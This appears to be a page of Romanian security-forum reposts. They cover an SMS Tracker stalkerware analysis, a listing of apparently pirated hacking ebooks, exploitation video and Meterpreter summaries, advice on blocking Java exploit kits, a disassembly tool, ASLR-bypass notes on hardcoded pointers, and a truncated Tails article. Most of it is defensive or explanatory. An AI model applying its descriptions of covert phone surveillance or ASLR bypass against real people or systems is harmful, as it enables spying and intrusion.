Nytro

Want to Spy? Google Play will help you Spyware or legitimate monitoring application? You decide. In this blog we'll discuss a 'legitimate' app that can be purchased in Google Play known as SMS Tracker. Now it's legitimate as it advertises exactly what it does, but based how this same application is packaged and distributed in other markets, it's clear that the vendor is also targeting another, less altruistic audience with this same application. The app also illustrates the powerful access permissions that an application can gain so long as the end user agrees to it, either explictly or otherwise. Details about the application: Name: SMS Tracker. Installs: 10,000-15,000. Description: Gizmoquip SMS Tracker - Track text messages and location data from all of your android phones. As per the description on the application’s Google Play page, the application is able to do the following: SMS Tracking – Intercepts text messages. Read all inbound and outbound text messages. Details include time and date, phone number, contact name and location of the target phone. Complete Text message tracking and logging. MMS tracking - Intercepts MMS multimedia messages. Read and view all inbound and outbound MMS messages. See what photos are sent to and from the target phone. Details include photo, time and date, phone number, contact name and location of the target phone. Browser Tracking – monitors all web browser activity on the target phone. Know which websites were visited, which pages were viewed and when. GPS Tracking – Logs GPS location information wich can later be viewed on a map. Know when and where the phone was located at all times. Breadcrumbs to record location information allowing parents to locate their children at frequent intervals. GPS logging occurs at a user defined rate (default interval is 5 minutes). Remote GPS logging and viewing give you the ability to see the location of your child’s phone, from any web browser. The breadcumb trail offers powerful GPS Tracking. Call Logging – Monitors all inbound, outbound and missed calls. Identifies the phone number, contact name, call duration, and location of the phone for every call. If you want to know where your kids are, just send them a text message. The location of the phone is recorded every time it sends or receives a text message. Tracking of System Events, including Device Powered On/Off, Device Attached / Removed to/from the charger, Apps installed/removed/updated. Silently monitor all inbound and outbound SMS messages. How the app can be used? First you need to download the application and install it on the device on which you want to spy. After installing an application you need to register it. Next, you need to go to Gizmoquip SMS Tracker - Track text messages and location data from all of your android phones., where you will be asked for your login name and password ,which was registered at a time of installing the application. This screenshot shows the dashboard after login. This screenshot shows the page where you can see logging from the device. It covers SMS, device information, call logs, network traffic, location details, etc. Zscaler’s concerns: In any other context, an application with these capabilities would clearly be labelled as spyware. At the vendor's (Gizmoquip.com - Download) they are selling a repackaged version of this app which has the same functionality but does not leave an icon on the device, thus making it more stealthy and harder to detect following installation. This version also does not contain the notification icon or privacy policy screen. Why the transparency? What audience is this version targeting? This same application could also serve generic template for other spyware projects by being wrapped with other code to provide the core functionality needed to create another malicious app. This type of app clearly shows the powerful level of access that can be granted to Android apps, so long as users grant permission. An app can access SMS, call logs, network traffic, hardware details, screen details etc. Always carefully read the permissions requested by an application before installing it on your device. The vendor is promoting this application as a tool for monitoring the mobile activities of your children. However, this same app would be a very effective tool for spying on someone once installed on their phone. You just need to install the app on the device which you want to spy and you are done. All the information about the device and all call and SMS logs can then be remotely monitored. Moreover, all of the user's private data is stored on the vendor's server. What guarantees are in place that the private data will remain private? In the increasingly common enterprise world of “Bring Your Own Device” (BYOD), such applications could be leveraged to expose corporate contact lists, email, browsing information and collect private data from corporate apps in the workplace. Enterprises often block access to 'non-official' app stores to prevent the installation of such apps, but this illustrates that such a restriction is no guaruntee that spyware can't be installed from an official source. Virustotal scan results: The application available from the vendor site (smstracker.com): https://www.virustotal.com/en/file/21aa6c6652287413f07ddfbcadea84441a500ee12816dfe4beed913e4a0fa636/analysis/ The Google Play store’s version: https://www.virustotal.com/en/file/a3b40fa9fea9600b55d4d07fd4f0358ee74e6924c342c5857c2a5311f7a11ed3/analysis/ Interestingly, despite virtually the same functionality, far fewer AV vendors flag the Google Play version as malicious. - Viral Sursa: Zscaler Research: Want to Spy? Google Play will help you

Parent Directory - Ebooks by Authors/ 02-Jul-2011 20:33 - Syngress - Aggressive Network Self-Defense.pdf 02-Jul-2011 20:33 83M Syngress - Best Damn Windows Server 2003 Book P..> 02-Jul-2011 20:34 21M Syngress - Botnets - The Killer Web App.pdf 02-Jul-2011 20:34 7.0M Syngress - Buffer Overflow Attacks.pdf 02-Jul-2011 20:34 5.4M Syngress - Building DMZs for Enterprise Network..> 02-Jul-2011 20:34 12M Syngress - Building SANs with Brocade Fabric Sw..> 02-Jul-2011 20:35 3.8M Syngress - Building a VoIP Network with Multime..> 02-Jul-2011 20:34 17M Syngress - C#.NET Web Developer's Guide.pdf 02-Jul-2011 20:34 6.8M Syngress - Check Point NG VPN-1 FireWall-1 Adva..> 02-Jul-2011 20:33 12M Syngress - Cisco Security - Professional's Guid..> 02-Jul-2011 20:33 15M Syngress - Cisco Security - Specialist's Guide ..> 02-Jul-2011 20:33 11M Syngress - Combating Spyware in the Enterprise.pdf 02-Jul-2011 20:34 8.0M Syngress - Creating Security Policies and Imple..> 02-Jul-2011 20:33 2.8M Syngress - Cyber Adversary Characterization - A..> 02-Jul-2011 20:33 4.1M Syngress - Cyber Crime Investigations.pdf 02-Jul-2011 20:33 9.2M Syngress - Cyber Spying - Tracking your Family'..> 02-Jul-2011 20:35 106M Syngress - Developer's Guide to Web Application..> 02-Jul-2011 20:33 11M Syngress - Email Virus Protection Handbook.pdf 02-Jul-2011 20:32 5.8M Syngress - Enemy at the Water Cooler.pdf 02-Jul-2011 20:33 6.3M Syngress - Essential Computer Security.pdf 02-Jul-2011 20:33 7.8M Syngress - Google Hacking for Penetration Teste..> 02-Jul-2011 20:34 13M Syngress - Google Hacking for Penetration Teste..> 02-Jul-2011 20:33 15M Syngress - Google Talking.pdf 02-Jul-2011 20:34 8.3M Syngress - Hack Proofing Linux.pdf 02-Jul-2011 20:32 12M Syngress - Hack Proofing Sun Solaris.pdf 02-Jul-2011 20:34 6.8M Syngress - Hack Proofing Windows 2000 Server.pdf 02-Jul-2011 20:33 12M Syngress - Hack Proofing XML.pdf 02-Jul-2011 20:34 7.1M Syngress - Hack Proofing your Identity in the I..> 02-Jul-2011 20:33 8.9M Syngress - Hack Proofing your Network - 2nd Edi..> 02-Jul-2011 20:34 8.8M Syngress - Hack Proofing your Web Applications.pdf 02-Jul-2011 20:33 8.6M Syngress - Hack Proofing your Wireless Network.pdf 02-Jul-2011 20:32 6.6M Syngress - Hack Proofing your network.pdf 02-Jul-2011 20:34 2.9M Syngress - Hack the Stack.pdf 02-Jul-2011 20:33 7.2M Syngress - How to Cheat at Securing a Wireless ..> 02-Jul-2011 20:32 12M Syngress - InfoSec Career Hacking - Sell your S..> 02-Jul-2011 20:34 84M Syngress - Intrusion, Prevention and Active Res..> 02-Jul-2011 20:34 85M Syngress - LEGO Software Power Tools.pdf 02-Jul-2011 20:34 15M Syngress - Linksys WRT54G Ultimate Hacking.pdf 02-Jul-2011 20:32 16M Syngress - Metasploit Toolkit for Penetration T..> 02-Jul-2011 20:34 4.9M Syngress - Microsoft Vista for IT Security Prof..> 02-Jul-2011 20:34 19M Syngress - Nessus Network Auditing.pdf 02-Jul-2011 20:33 4.6M Syngress - Ninja Hacking - Unconventional Penet..> 02-Jul-2011 20:34 9.9M Syngress - Nmap in the Enterprise - Your Guide ..> 02-Jul-2011 20:34 6.1M Syngress - OS X for Hackers at Heart.pdf 02-Jul-2011 20:34 15M Syngress - Penetration Tester's Open Source Too..> 02-Jul-2011 20:33 34M Syngress - Penetration Tester's Open Source Too..> 02-Jul-2011 20:35 27M Syngress - Phishing Exposed.pdf 02-Jul-2011 20:34 8.3M Syngress - Practical VoIP Security.pdf 02-Jul-2011 20:33 9.7M Syngress - Programmer's Ultimate Security Deskr..> 02-Jul-2011 20:33 4.5M Syngress - RFID Security.pdf 02-Jul-2011 20:34 5.9M Syngress - SQL Injection Attacks and Defense.pdf 02-Jul-2011 20:34 6.5M Syngress - Scene of the Cybercrime - Computer F..> 02-Jul-2011 20:33 5.0M Syngress - Scripting VMware Power Tools.pdf 02-Jul-2011 20:34 5.0M Syngress - Secure Your Network for Free.pdf 02-Jul-2011 20:33 7.2M Syngress - Securing the Cloud - Cloud Computer ..> 02-Jul-2011 20:34 3.3M Syngress - Security+ Study Guide.pdf 02-Jul-2011 20:32 11M Syngress - Security Assessment Case Studies for..> 02-Jul-2011 20:34 5.0M Syngress - Security Log Management - Identifyin..> 02-Jul-2011 20:34 6.6M Syngress - Security Sage's Guide to Hardening t..> 02-Jul-2011 20:32 11M Syngress - Snort 2.0 Intrusion Detection.pdf 02-Jul-2011 20:34 7.1M Syngress - Snort 2.1 Intrusion Detection - 2nd ..> 02-Jul-2011 20:33 12M Syngress - Snort IDS and IPS Toolkit.pdf 02-Jul-2011 20:34 8.4M Syngress - Sockets, Shellcode, Porting and Codi..> 02-Jul-2011 20:33 112M Syngress - Special Ops - Host and Network Secur..> 02-Jul-2011 20:32 17M Syngress - Stealing the Network - How to Own a ..> 02-Jul-2011 20:34 9.1M Syngress - Stealing the Network - How to Own th..> 02-Jul-2011 20:33 4.6M Syngress - Systems Security Certification Pract..> 02-Jul-2011 20:34 6.3M Syngress - Techno Security’s Guide to Managin..> 02-Jul-2011 20:34 16M Syngress - The Mezonic Agenda - Hacking the Pre..> 02-Jul-2011 20:34 16M Syngress - VB.NET Developer's Guide.pdf 02-Jul-2011 20:33 6.4M Syngress - WarDriving and Wireless Penetration ..> 02-Jul-2011 20:33 21M Syngress - Wireless Hacking - Projects for Wi-F..> 02-Jul-2011 20:34 18M Syngress - Wireshark and Ethereal - Network Pro..> 02-Jul-2011 20:32 13M Syngress - Writing Security Tools and Exploits.pdf 02-Jul-2011 20:35 11M Syngress - XSS Attacks.pdf 02-Jul-2011 20:34 7.3M Syngress - Zen and the Art of Information Secur..> 02-Jul-2011 20:34 5.2M Syngress - Zero Day Exploit - Countdown to Dark..> 02-Jul-2011 20:32 3.7M The Hackademy - Hors Serie 1.pdf 02-Jul-2011 20:35 12M The Hackademy - Hors Serie 2.pdf 02-Jul-2011 20:32 36M The Hackademy - Hors Serie 3.pdf 02-Jul-2011 20:34 14M The Hackademy Prog - Apprendre à Programmer en..> 02-Jul-2011 20:32 14M The Hackademy Prog - Apprendre à Programmer en..> 02-Jul-2011 20:34 34M The Hackademy School - Hack Newbie.pdf 02-Jul-2011 20:35 3.5M The Hackademy School - Hack Security Pro.pdf 02-Jul-2011 20:33 6.4M The Hackademy School - Linux.pdf 02-Jul-2011 20:33 19M The Hackademy School - Mini Guide Anonymat.pdf 02-Jul-2011 20:34 2.3M The Hackademy School - Newbie - part 1.pdf 02-Jul-2011 20:33 10M The Hackademy School - Newbie - part 2.pdf 02-Jul-2011 20:34 9.9M The Hackademy School - Newbie - part 3.pdf 02-Jul-2011 20:33 11M The Hackademy School - Newbie - part 4.pdf 02-Jul-2011 20:33 9.2M The Hackademy School - Securite wifi.pdf 02-Jul-2011 20:34 1.3M ZI Hackademy - Newbie 1.pdf 02-Jul-2011 20:33 25M ZI Hackademy - Newbie 2.pdf 02-Jul-2011 20:32 41M ZI Hackademy - Newbie 3.pdf 02-Jul-2011 20:34 31M Sursa: http://n-pn.info/repo/HackBBS/HackBBS/Docs_HackAngel/

[h=1]Another X.Org Security Bug Found, Dates Back To 1991[/h] Posted by Michael Larabel in X.Org on 07 January 2014 06:00 PM EST Another X.Org Security Advisory had to be publicly issued today to make known a buffer overflow in an X.Org library that's been present in every X11 release from X11R5 and the code was completed way back in 1991. Back in October there was a X11 security advisory going back to 1993 and today's noted security issue was for code introduced in May of 1991. This security advisory comes just days after the X Server security was called a disaster with what will amount to at least hundreds of open security issues found by a researcher. The security was found via running the cppcheck utility as a static analyzer to look at the code. The issue found is a stack buffer overflow in the passing of BDF font files in libXfont. It's an issue present for more than two decades and was easily spotted with static analysis of the code. When a buffer overflow does happen in libXfont, it's possible that the bug could lead to an unprivileged user acquiring root access to the system. This bug has been found in every X Server release going back to X11R5 and was corrected with the new release of libXfont 1.4.6. More details on this latest security advisory can be found via the xorg-announce list. Sursa: [Phoronix] Another X.Org Security Bug Found, Dates Back To 1991

Nu mai pune poze cu black_death, induci lumea in eroare.

30c3 - Hacking As Artistic Practice Description: !Mediengruppe Bitnik are contemporary artists. In their talk they will show two examples of their work, illustrating the translation of hacking from the computer field into an artistic practice. Bitnik will show how to hack the opera in ten easy steps and what happens when you send a parcel with a hidden live webcam to Julian Assange at the Ecuadorian Embassy in London. Using the strategies of hacking, !Mediengrupppe Bitnik intervenes into settings with the aim of opening them up to re-evaluation and new perspectives. «Opera Calling» was an artistic intervention into the cultural system of the Zurich Opera. From March 9th to May 26th 2007, audio bugs, hidden in the auditorium, transmitted the performances of the Zurich Opera to randomly selected telephone land-lines in the city of Zurich. In proper style of a home-delivery-service, anyone who picked up their telephone, was able to listen to the on-going opera performances for as long as s/he wanted through a live connection with the audio bug signal. The Zurich Opera launched a search for the bugs and in a first reaction threatened to take legal action if the transmissions were not stopped and the bugs not removed. «Delivery for Mr. Assange» is a live mail art piece. In January 2013 !Mediengruppe Bitnik sent Wikileaks-Founder Julian Assange a parcel containing a camera. Julian Assange has been living in the center of a diplomatic crisis at the Ecuadorian embassy in London since June 2012. Through a hole in the parcel, the camera documented and live-tweeted its journey through the postal system, letting anyone online follow the parcel's status in real-time. !Mediengruppe Bitnik regard this work as a SYSTEM_TEST. Would the parcel reach its intended destination? Or would it be removed from the postal system? For More Information please visit : - https://events.ccc.de/congress/2013/wiki/Main_Page Sursa: 30c3 - Hacking As Artistic Practice

Stiu, dar e ceva ce trebuie vazut.

Pacat ca lumea prefera un serial/porn/film de cacat in loc sa vada asa ceva.

Windows Exploitation (Structured Exception Handler Based Exploitation) Description: This video demos a Structured Exception Handler (SEH) stack overflow exploit. It gives some basic idea about the SEH structure in windows operating system. It explains the technique used to perform exploitation. Sursa: Windows Exploitation (Structured Exception Handler Based Exploitation)

Metasploit Meterpreter and NAT Published January 4, 2014 | By Corelan Team (corelanc0d3r) Professional pentesters typically use a host that is connected directly to the internet, has a public IP address, and is not hindered by any firewalls or NAT devices to perform their audit. Hacking "naked" is considered to be the easiest way to perform a penetration test that involves getting shells back. Not everyone has the luxury of putting a box directly connected to the internet and as the number of free public IP addresses continues to decrease, the need for using an audit box placed in a LAN, behind a router or firewall, will increase. Putting an audit box behind a device that will translate traffic from private to public and vice versa has some consequences. Not only will you need to be sure that the NAT device won’t "break" if you start a rather fast portscan, but since the host is in a private LAN, behind a router or firewall, it won’t be reachable directly from the internet. Serving exploits and handling reverse, incoming, shells can be problematic in this scenario. In this small post, we’ll look at how to correctly configure Meterpreter payloads and make them work when your audit box is behind a NAT device. We’ll use a browser exploit to demonstrate how to get a working Meterpreter session, even if both the target and the Metasploit "attacker" box are behind NAT. Articol: https://www.corelan.be/index.php/2014/01/04/metasploit-meterpreter-and-nat/

Windows Exploitation (Simple Stack Overflow) Description: This video demos a simple stack overflow exploit. It gives some basic idea about the application that is being exploited, some idea about the exploit and demos how a debugger can be used to perform exploitation. Sursa: Windows Exploitation (Simple Stack Overflow)

Fixed.

Ati inceput noul an ca niste pizde, va plangeti din orice rahat.

Din cate se pare, sunt pe "invisible".

Fa un screenshot.

Done. Langa "Mark forums as read", jos.

Nu am inteles. Sa pun link cu "New posts" langa "Mark forums as read"?

V-am pus "Mark forums as read", verificati daca merge. Am pus si link de "Send PM". Verificati.

[h=3]Effective blocking of Java exploits in enterprise environments[/h] [h=2]Preface[/h] "Java everyday" was a joke about Java vulnerabilities, where almost every day a new Java zero-day was seen. Recently, the "Java 0-day spotted in the wild" is no longer in the headlines every week (see http://java-0day.com), but Java exploits are still the biggest concern regarding exploit kits and drive-by-download malware. In a recent Kaspersky report, they found that about 90% of the exploit kits were trying to infect the victim machine via Java. [h=2]The "typical useless" recommendations[/h] Okay, so we have a problem called Java in the browser, let's look for a solution! The two simplest "solutions" of all are: Update your Java. Remove Java from your browser. Both solutions are non-solutions for enterprises. Still, a hell a lot of in-house-built applications need old Java - e.g. 1.6.x, which is end-of-life since February 2013. Next recommended "solution" is: "Create separate browsers for Internet and intranet usage. The intranet facing browser supports Java, the Internet facing does not." Although this sounds pretty effective, there are still a lot of problems with this approach. Now IT has to update two browsers instead of one. Users has to be trained, and in a web-security gateway (web proxy) one has to configure that this browser can go there but the other can't, etc. And still there might be Java applet based applications outside of the organization which has to be used by a bunch of people. Next solution: "Use NoScript". LOL. Teach NoScript to 50000 users, and see how they will learn the "Allow all this page" first, and "Allow scripts globally" the next time. Next solution: "Click-to-play" I think this is a good countermeasure, but from now on the exploit maker either needs an exploit to bypass the click-t-play, or to socially engineer the user to click so this is not a bulletproof solution either. [h=2]The solution[/h] Okay, so far we have five totally useless recommendations. The next one seems pretty good at the first sight: "White-list websites which need Java, and only allow Java to these sites." Let's dig deeper. How can we "white-list" sites? This is not supported from Java out-of-the-box. In a decent web-security gateway one can create white-lists, but we have to define a condition for Java traffic. A common misconception is to say: let's identify Java traffic for .class, .jar, and .jnlp file extensions, and only allow Java for white-listed websites. Although this will block some exploits, but not all. Here is a screenshots from the very popular Neutrino exploit kit: This is the .jar exploit. As you can see, there is no extension at all in the HTTP request (e.g. .jar). But what about the Mime-type in the response? It is video/quicktime… But it is the jar exploit, with a detection of 2/49 on Virustotal. And, yes, I'm aware of the fact that Virustotal statistics are useless and AV has other possibilities in the exploit chain to block the malware being dropped. Or not Two things can be flagged here as Java: the User-agent and the Mime-type in the request. I recommend checking for both. The User-agent can be checked via regular expressions, and if one matches, flag it as Java request. [h=2]Payload delivery[/h] Although not closely related to the exploit, but the malware payload delivery is interesting as well. After successful exploitation, the exploit payload downloads the malware from the the same site. In a normal web-security gateway, executables can be flagged, and blocked for average users. Now look at the Neutrino exploit kit: No executable extension (e.g. .exe, .dll), the response Mime-type is faked to audio/mpeg, and even the malware is XOR encrypted with a 4 character key (I let the exercise to the reader to guess the XOR key). Even if the web-security gateway looks for file headers to identify executables, it won't find it. The malware is decrypted only on the victim, where the AV might or might not find it. Although the User-agent here is Java again, be aware of the fact that at this stage, the User-agent can be faked by the exploit. [h=2]Mobile devices[/h] If we white-list sites on the web-security gateway, and block any other traffic when we see Java based User-agent or content-type, we are good. Well, almost. As long as the client is in the enterprise… What you can do here is to enforce the mobile devices the use of VPN every time it is outside of the corporate network, and only connect it to the Internet through the corporate web-security gateway. I know, this is still not a solution, but I can't think anything better at the moment. Leave a comment if you have a solution for this. Now the only Java threat is that someone hacks one of the white-listed websites in a watering hole attack, and serves the java exploit from the same page. Not a likely attack, but possible for a real advanced threat. [h=2]Conclusion[/h] If you are a CISO (or has the same position), you should proactively block Java exploits. White-listing websites which require Java is not impossible. Not a lot of sites use Java applets nowadays anyways. I would say average users see Java applets more in an exploit than in a legit site... You can flag Java traffic via User-agent regular expression, or content-type (in the request), or both. Special care needs to be taken on mobile devices, which leave the enterprise on a regular basis. Of course, you will need other protections too, because this is not a 100% solution. And if you are a plain home user, you can safely delete Java from your browser, or use a decent Internet Security Suite which can effectively block Java exploits. Posted by Z at 1:30:00 PM Sursa: Jump ESP, jump!: Effective blocking of Java exploits in enterprise environments

The 2013 Top 7 Best Linux Distributions for You Thursday, 14 March 2013 09:00 Katherine Noyes Back in 2010 Linux.com published a list of the year's top Linux distributions, and the popularity of the topic made it an instant annual tradition. There have been several shifts and shakeups on the lists presented since then, of course, and -– as you'll soon see – this year's offering holds true to that pattern. In fact, I think it's safe to say that the past year has seen so much upheaval in the desktop world – particularly where desktop environments are concerned – that 2013's list could come as a surprise to some. Let me hasten to note that the evaluations made here are nothing if not subjective. There also is no such thing as the “one best” Linux distro for anything; in fact, much of the beauty of Linux is its diversity and the fact that it can be tweaked and customized for virtually any taste or purpose. The one best Linux for you, in other words, is the flavor you choose for your purpose and preference and then tweak until it feels just right. Still, I think some Linux flavors stand out these days as leaders for particular use cases. I'm going to diverge a bit from past lists here when it comes to those categories, however. Specifically, where past lists have included the category “Best Linux LiveCD,” I think that's become almost obsolete given not just the general shift to USBs -- some PCs don't even come with CD drives anymore, in fact -- but also the fact that most any Linux distro can be formatted into bootable form. On the other hand, with the arrival of Steam for Linux, I think this year has brought the need for a new category: Best Linux for Gaming. Read on, then, for a rundown of some of the best of what the Linux world has to offer. Best Desktop Distribution There are so many excellent contenders for desktop Linux this year that it's become a more difficult choice than ever – and that's really saying something. Canonical's Ubuntu has made great strides in advancing Linux's visibility in the public eye, of course, while Linux Mint and Fedora are both also very strong choices. Regarding Ubuntu, however, a number of issues have come up over the past year or so, including the inclusion of online shopping results in searches – an addition Richard Stallman and the EFF have called “spyware.” At the same time, the upheaval caused by the introduction of mobile-inspired desktops such as Unity and GNOME 3 continues unabated, spurring the launch of more classically minded new desktops such as MATE and Cinnamon along with brand-new distros. For best desktop Linux distro, I have to go with Fuduntu, one of this new breed of up-and-comers. Originally based on Fedora but later forked, Fuduntu offers a classic GNOME 2 interface – developed for the desktop, not for mobile devices -- and generally seems to get everything right. Besides delivering the classic desktop so many Linux users have made clear that they prefer, Fuduntu enjoys all the advantages of being a rolling release distribution, and its repository includes key packages such as Netflix and Steam. I've been using it for months now and haven't seen a single reason to switch. Best Laptop Distribution At the risk of sounding repetitive, I have to go with Fuduntu for best Linux distro as well. In fact, the distro is optimized for mobile computing on laptops and netbooks, including tools to help achieve maximum battery life when untethered. Users can see battery life improvements of 30 percent or more over other Linux distributions, the distro's developers say. Such optimizations combined with this solid and classic distro make for a winner on portable devices as well. Best Enterprise Desktop Linux The enterprise is one context in which I have to agree with recent years' evaluations, and that includes the enterprise desktop. While SUSE Linux Enterprise Desktop is surely RHEL's primary competitor, I think Red Hat Enterprise Linux is the clear leader in this area, with just the right combination of security, interoperability, productivity applications and management features. Best Enterprise Server Linux It's a similar situation on the server. While there's no denying SUSE Linux Enterprise Server has its advantages, Red Hat is pushing ahead in exciting new ways. Particularly notable about Red Hat this year, for example, is its new focus on Big Data and the hybrid cloud, bringing a fresh new world of possibilities to its customers. Best Security-Enhanced Distribution Security, of course, is one of the areas in which Linux really stands out from its proprietary competitors, due not just to the nature of Linux itself but also to the availability of several security-focused Linux distributions. Lightweight Portable Security is one relatively new contender that emerged back in 2011, and BackBox is another popular Ubuntu-based contender, but I still have to give my vote to BackTrack Linux, the heavyweight in this area whose penetration testing framework is used by the security community all over the world. Others surely have their advantages, but BackTrack is still the one to beat. Best Multimedia Distribution Ubuntu Studio has often been named the best distro for multimedia purposes in Linux.com's lists, but it's by no means the only contender. ZevenOS, for instance, is an interesting BeOS-flavored contender that came out with a major update last year. For sheer power and nimble performance, though, this year's nod goes to Arch Linux. With an active community and thousands of software packages available in its repositories, Arch stays out of the way so your PC can focus on the CPU-intensive tasks at hand. Best Gaming Distribution Last but certainly not least is the gaming category, which surely represents one of the biggest developments in the Linux world over this past year. While it may not be relevant for enterprise audiences, gaming has long been held up as a key reason many users have stayed with Windows, so Valve's decision to bring its Steam gaming platform to Linux is nothing if not significant. The Linux distro choice here? That would have to be Ubuntu, which is specifically promoted by the Valve team itself. “Best experienced on Ubuntu” reads the tag line that accompanied the Steam for Linux release last month, in fact. Bottom line: If you're into gaming, Ubuntu Linux is the way to go. Have a different view on any of these categories? Please share your thoughts in the comments. Sursa: The 2013 Top 7 Best Linux Distributions for You | Linux.com

[h=1]BSidesDE 2013 2 2 antipwny a windows based ids ips for metasploit rohan vazarkar david bitner[/h] Bsides Delaware 2013 Videos(Hacking Illustrated Series InfoSec Tutorial Videos)

[h=3]backtrace.py version 0.3[/h] backtrace.py version 0.3 has been pushed out to it's repo. A couple of notable features have been added. The previous version only tracked the use of the MOV instruction. This is kind of useful..I guess..well at least it was fun to code. The current version tracks whenever a register(ECX) or it's sub-register (CX) are manipulated. The old version relied on string comparisons. For example if we back trace from the highlighted code up we would see al is referenced then EAX, then byte_1003B03C, then dl, etc.. .text:10004E99 mov byte_1003B03C, al .text:10004E9E movsx ecx, byte_1003B03C .text:10004EA5 imul ecx, 0A2h .text:10004EAB mov byte_1003B03C, cl .text:10004EB1 movsx edx, byte_1003B03C .text:10004EB8 xor edx, 0A4h .text:10004EBE mov byte_1003B03C, dl .text:10004EC4 movsx eax, byte_1003B03C .text:10004ECB cdq .text:10004ECC mov ecx, 0C8h .text:10004ED1 idiv ecx .text:10004ED3 mov byte_1003B03C, al .text:10004ED8 xor eax, eax .text:10004EDA jmp short loc_10004F01 .text:10004EDC ; --------------------------------------------------------------------------- .text:10004EDC movsx edx, byte_1003B03C .text:10004EE3 or edx, 0D2h .text:10004EE9 mov byte_1003B03C, dl .text:10004EEF movsx eax, byte_1003B03C .text:10004EF6 imul eax, 0C1h .text:10004EFC mov byte_1003B03C, al The old version did not know that AL is the lower address of EAX due to the use of string comparison. The new version does a simple check of the register name and it's purpose. Note: there will be some issues if AH is moved into AL or other similar operations. I didn't code that logic in. If we were to back trace the code above we would have the following output. Python>s.backtrace(here(),1) 0x10004efc mov byte_1003B03C, al 0x10004ef6 imul eax, 0C1h 0x10004eef movsx eax, byte_1003B03C 0x10004ee9 mov byte_1003B03C, dl 0x10004ee3 or edx, 0D2h 0x10004edc movsx edx, byte_1003B03C 0x10004ed3 mov byte_1003B03C, al 0x10004ec4 movsx eax, byte_1003B03C 0x10004ebe mov byte_1003B03C, dl 0x10004eb8 xor edx, 0A4h 0x10004eb1 movsx edx, byte_1003B03C 0x10004eab mov byte_1003B03C, cl 0x10004ea5 imul ecx, 0A2h 0x10004e9e movsx ecx, byte_1003B03C 0x10004e99 mov byte_1003B03C, al The code also tracks how some general purpose instructions manipulate different registers. Most of them are simple due to the x86 standard of instruction destination source format. Not all of them are though. I spent a good amount of time wondering what variables to back trace when following instructions such as DIV. Is EAX or the DIV operand more important back trace? I went with the operand but in the future I plan on creating back split trace that will track EAX and the operand passed to DIV. Odds are there are still more general purpose instructions I need to check for. XADD is a pretty cool instruction. The shortest Fibonacci can be written using XADD. This version was written in order for me to crack an obfuscation technique that I have seen lately. Using backtrace.py and the last line of the dead code blocks I'm able to identify most of the junk code and variables. I'm sure there are flaws (like not tracing push or pops...future release) but so far it is working well for me. I hope the code is of use to others. If you have any recommendations, thoughts, etc please shoot me an email (line 20 of the source code) or ping me on twitter. Sursa: Hooked on Mnemonics Worked for Me: backtrace.py version 0.3

[h=3]Hardcoded Pointers[/h]Use of hardcoded pointer could enable the attacker to bypass ASLR. In this draft I'm describing potential methods to find a hardcoded pointer in your target. When exploiting particular vulnerabilities it is fundamental to read/write or jump to predictable memory location in the process' address space. ASLR randomizes the memory locations of various key locations including addresses of libraries. Even though we see that some high profile applications still load libraries with ASLR disabled, we have high hopes they will fix the problem soon. That wouldn't solve the problem overall though. Applying ASLR to all libraries does not mean there is not easily predictable locations in the process' address space. There are API functions that accept address to allocate memory at that address. These functions can be used to hardcode memory address, and so to assign a fixed address to a pointer (CWE-587). As a consequence, it gives an attacker a chance to read/write or jump to known address to bypass ASLR. For these functions you can specify the desired starting address that you want to allocate. When doing security audit it's worth checking if the functions are called with hardcoded addresses. VirtualAlloc VirtualAllocEx VirtualAllocExNuma MapViewOfFileEx MapViewOfFileExNuma The following functions accept address to read as parameter. These are not appear to be useful but leave them for potential future use. UnmapViewOfFile, WriteProcessMemory, ReadProcessMemory, FlushViewOfFile, FlushInstructionCache, Toolhelp32ReadProcessMemory, GetWriteWatch, ResetWriteWatch, ReadProcessMemoryProc64, VirtualUnlock, MapUserPhysicalPages, VirtualProtect, VirtualProtectEx, VirtualQueryEx, GetFrameSourceAddress, CompareFrameDestAddress, VirtualFree, VirtualFreeEx, FindNextFrame, WSPStringToAddress, CompareAddresses, AddressToString It's also worth checking if the application you audit uses shared memory as some application map the memory at fixed address, and even boost library supports the use of this insecure method. The use of relative pointers is less efficient than using raw pointers, so if a user can succeed mapping the same file or shared memory object in the same address in two processes, using raw pointers can be a good idea. To map an object in a fixed address, the user can specify that address in the mapped region's constructor: mapped_region region ( shm //Map shared memory , read_write //Map it as read-write , 0 //Map from offset 0 , 0 //Map until the end , (void*)0x3F000000 //Map it exactly there ); When auditing source code for hardcoded address it's worth looking for constant starting with 0x ending with 0000 as some might indicate hardcoded memory address. I wrote a simple batch script for that. The another batch script I have is for binary code. I recommend to use if you don't find a bug using other methods. To use it you need to execute dasmdir.py on the binary file to produce disassembly, and you may run the batch script on it to get the immediate values filtered. This is interesting. Here is an example of someone asking how to allocate memory at fixed address unintentionally making his software less secure. Sursa: Reversing on Windows: Hardcoded Pointers

toolsmith: Tails - The Amnesiac Incognito Live System Privacy for anyone anywhere Prerequisites/dependencies Systems that can boot DVD, USB, or SD media (x86, no PowerPC or ARM), 1GB RAM Introduction “We will open the book. Its pages are blank. We are going to put words on them ourselves. The book is called Opportunity and its first chapter is New Year's Day.” -Edith Lovejoy Pierce First and foremost, Happy New Year! If you haven’t read or heard about the perpetual stream of rather incredible disclosures continuing to emerge regarding the NSA’s activities as revealed by Edward Snowden, you’ve likely been completely untethered from the Matrix or have indeed been hiding under the proverbial rock. As the ISSA Journal focuses on Cyber Security and Compliance for the January 2014 issue, I thought it a great opportunity to weave a few privacy related current events into the discussion while operating under the auspicious umbrella of the Cyber Security label. The most recent article that caught my attention was Reuters reporting that “as a key part of a campaign to embed encryption software that it could crack into widely used computer products, the U.S. National Security Agency arranged a secret $10 million contract with RSA, one of the most influential firms in the computer security industry.” The report indicates that RSA received $10M from the NSA in exchange for utilizing the agency-backed Dual Elliptic Curve Deterministic Random Bit Generator (Dual EC DRBG) as its preferred random number algorithm, an allegation that RSA denies in part. In September 2013 the New York Times reported that an NSA memo released by Snowden declared that “cryptanalytic capabilities are now coming online…vast amounts of encrypted Internet data which have up till now been discarded are now exploitable." Ars Technica’s Dan Goodin described Operation Bullrun as a “a combination of ‘supercomputers, technical trickery, court orders, and behind-the-scenes persuasion’ to undermine basic staples of Internet privacy, including virtual private networks (VPNs) and the widely used secure sockets layer (SSL) and transport layer security (TLS) protocols.” Finally, consider that, again as reported by DanG, a senior NSA cryptographer, Kevin Igoe, is also the co-chair of the Internet Engineering Task Force’s (IETF) Crypto Forum Research Group (CFRG). What could possibly go wrong? According to Dan, Igoe's leadership had largely gone unnoticed until the above mentioned reports surfaced in September 2013 exposing the role NSA agents have played in "deliberately weakening the international encryption standards adopted by developers." I must admit I am 